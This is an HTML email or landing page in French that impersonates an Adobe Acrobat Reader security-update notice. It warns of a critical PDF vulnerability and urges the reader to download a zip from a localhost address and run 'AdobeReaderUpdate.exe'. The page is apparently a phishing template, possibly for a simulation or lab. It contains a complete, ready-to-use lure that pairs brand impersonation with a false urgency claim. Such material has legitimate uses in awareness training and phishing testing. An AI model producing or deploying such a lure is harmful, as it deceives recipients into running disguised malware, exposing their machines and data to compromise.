<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <title>Mise à jour de sécurité Adobe Acrobat Reader</title>
    <style>
        body { font-family: Arial, sans-serif; background: #f4f4f4; color: #222; }
        .container { max-width: 600px; margin: 40px auto; background: #fff; padding: 32px; border-radius: 8px; box-shadow: 0 0 12px #ddd; }
        .logo { display: block; margin: 0 auto 24px auto; width: 80px; }
        .title { font-size: 24px; color: #e1251b; font-weight: bold; text-align: center; margin-bottom: 16px; }
        .content { font-size: 16px; margin-bottom: 24px; }
        .button {
            display: inline-block;
            background: #e1251b;
            color: #fff;
            padding: 14px 28px;
            border-radius: 5px;
            text-decoration: none;
            font-size: 16px;
            font-weight: bold;
            margin: 0 auto;
            text-align: center;
        }
        .footer { margin-top: 36px; font-size: 11px; color: #888; text-align: center; }
        .alert { background: #fff3cd; color: #856404; border: 1px solid #ffeeba; padding: 12px; border-radius: 4px; margin-bottom: 20px; }
    </style>
</head>
<body>
    <div class="container">
        <img src="Adobelogo.png" class="logo">
        <div class="title">Mise à jour de sécurité critique disponible</div>
        <div class="alert">
            <b>Important :</b> Une vulnérabilité critique a été détectée dans Adobe Acrobat Reader. Cette faille pourrait permettre à des personnes malveillantes de prendre le contrôle de votre ordinateur via des fichiers PDF corrompus.
        </div>
        <div class="content">
            Bonjour,<br><br>
            Adobe a publié une mise à jour de sécurité pour Adobe Acrobat Reader sur Windows.<br>
            <b>Nous vous recommandons vivement d’installer cette mise à jour dès maintenant</b> afin de garantir la sécurité de vos documents et de vos données.<br><br>
            Pour installer la dernière version, cliquez sur le bouton ci-dessous&nbsp;:
        </div>
        <div style="text-align: center;">
            <a href="http://localhost:8000/download" class="button">Télécharger la mise à jour</a>
        </div>
        <div class="content" style="margin-top: 24px;">
            <b>Comment installer la mise à jour&nbsp;?</b><br>
            1. Téléchargez le dossier compressé de mise à jour.<br>
            2. Décompressez le dossier.<br>
            3. Exécutez le fichier AdobeReaderUpdate.exe.<br>
            <br>
            Pour plus d’informations, consultez le <a href="https://helpx.adobe.com/fr/security/products/acrobat.html" style="color: #e1251b;">bulletin de sécurité Adobe</a>.
        </div>
        <div class="footer">
            Ce message a été envoyé automatiquement. Merci de ne pas y répondre.<br>
            © 2025 Adobe. Tous droits réservés.
        </div>
    </div>
</body>
</html>
